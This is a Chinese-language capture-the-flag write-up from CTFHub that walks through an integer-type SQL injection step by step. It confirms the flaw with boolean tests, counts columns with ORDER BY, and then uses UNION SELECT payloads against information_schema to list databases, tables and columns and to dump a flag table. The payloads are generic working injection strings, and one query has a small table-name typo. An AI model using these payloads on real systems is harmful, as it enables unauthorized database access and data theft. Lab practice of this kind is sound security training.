【ctfhub】sql整数型注入

整数型注入

在这里插入图片描述

在1后加一个’ 无回显

输入id=1 and 1=1 出现回显

将1=1变为1=2—》语句正确但是无法访问数据库（图三）

【可判定此处有整数注入漏洞】

在这里插入图片描述

输入id=1 order by 2 看字段数量是否是两个

没有报错，证明字段的个数为2

【用order by来判断字段的个数，可以从10开始，利用二分法，一直试到2】

在这里插入图片描述

通过union，即输入

/?id=-1 union select 1,2

在这里插入图片描述

可以发现需要的数据在2的位置

查找当前数据库名：

/?id=-1 union select 1,database()

在这里插入图片描述

查找所有数据库名：

?id=-1 union select 1,group_concat(schema_name)from information_schema.schemata

在这里插入图片描述

获取当前数据库所有的表名

/?id=-1 union select 1,group_concat(table_name) from information_schema.table where table_schema='sqli'

在这里插入图片描述

得出flag中的所有字段

/?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'

在这里插入图片描述

获取flag中的所有数据

/?id=-1 union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述

得到答案